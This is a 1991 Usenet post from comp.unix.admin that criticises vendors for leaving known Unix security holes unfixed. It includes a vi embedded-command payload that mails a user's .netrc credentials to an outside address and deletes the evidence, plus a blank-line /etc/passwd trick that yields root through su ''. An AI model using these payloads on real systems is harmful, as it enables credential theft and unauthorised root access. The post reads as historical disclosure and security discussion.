Questions about UNIX viruses
John Chambers
jc at minya.UUCP
Sun Apr 14 02:26:01 AEST 1991
In article <2755 at legato.Legato.COM>, nowicki at legato (Bill Nowicki) writes:
> In article <11685 at dog.ee.lbl.gov> torek at elf.ee.lbl.gov (Chris Torek) writes:
> >... raisch at Control.COM (Robert Raisch) writes:
> >>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
> >>flaws in systems software to attack. Both Sun and Dec were aware of these
> >>security holes as far back as 1980.
> >
> >Oh really? Please produce some evidence to this effect.
> I would like to repeat this request. I was the software engineer
> working on sendmail for Sun at the time, and it was news to me.
The sendmail problem I don't have any history on, but there are
several other similar problems in Unix utilities for which I can give
examples with dates that show how hard it can be to get the news out.
Back in '83 (just after I moved to Massachusetts, to I know I have the
date right) there was a flurry of dire warnings on several bulletin
boards concerning a new "feature" in the vi editor. This was the
ability of vi to notice embedded lines starting with a ':', and
interpret them as vi commands during initial loading of the file. It
was pointed out what could be done by sending mail to a user
(especially a super-user) that contained lines like:
:!mail joe at some.where <$HOME/.netrc
:-,.d
This is of course a valuable feature of vi, but it should be disabled
by default (as it is now in most releases), so that the user must put
something in $EXINIT or .exrc to enable it.
It has been 8 years since this was widely publicised. Just a few
months ago I discovered that the vi from one vendor still had this
feature enabled by default. 8 years! I was tempted to email them a bug
report that did something like the above to illustrate the problem. I
resisted, and just embedded a command like
:!echo "There's a security hole in the vi editor."|mail root $USER
No, I won't tell you which vendor this was. You should try it on your
system, and if it works, you know what to do.
For another example, it's now been almost exactly 10 years since I
learned about the problems caused by a blank line in the /etc/passwd
file. Many vendors have fixed it; others haven't. For instance, last
year I saw some shocked expressions on the faces of a number of people
at Digital when I asked them to add such a blank line, then typed:
su ''
in a non-super-user window and immediately got a '#' prompt. This was
on some Ultrix 3.1 systems. Recently, I tried it on some 4.1 systems,
and to my relief it no longer worked. But it took nearly a decade to
correct this problem in Ultrix, and it has been know to me and others,
and described in articles like this, over and over and over.
You might try it on your system. If it doesn't work, try one more
experiment. With the blank line in the password file and after your
entry, change your own password, and then try the "su ''" command.
Sometimes the blank line itself won't work, but when some user changes
his password, the rest of the /etc/passwd file gets rewritten, and the
blank line becomes:
::0::::
which is the null-super-user entry that elicits the bug.
10 years!?
How do you get the word out? Both of these problems have been
thoroughly documented on numerous bulletin-boards. Lots of email has
passed back and forth describing them. Why the #*&%^$& is it so
difficult to correct such problems?
As for sendmail, well, I haven't followed the appropriate bulletin
boards to see all the warnings that may or may not have been there.
But really, I don't need to. Just look around at how sendmail is
installed. Almost everywhere, it runs as root, talks on TCP port 25 in
ASCII to anyone who knows its language, requires no authentication,
and is capable of running shell commands in response to its input. Add
to that the fact that it is "controlled" by a config file that is
poorly understood by all but a handful of experts, and you have a sure
entryway for all sorts of unwanted actions. I mean, it doesn't take a
genius to realize the potential. How could anyone with even the
slightest understanding of computer security not be suspicious? What
bigger red flag could there possibly be?
[Well, OK, you could install DOS. ;-]
--
All opinions Copyright (c) 1991 by John Chambers. Inquire for licensing at:
Home: 1-617-484-6393
Work: 1-508-486-5475
Uucp: ...!{bu.edu,harvard.edu,ima.com,eddie.mit.edu,ora.com}!minya!jc
More information about the Comp.unix.admin
mailing list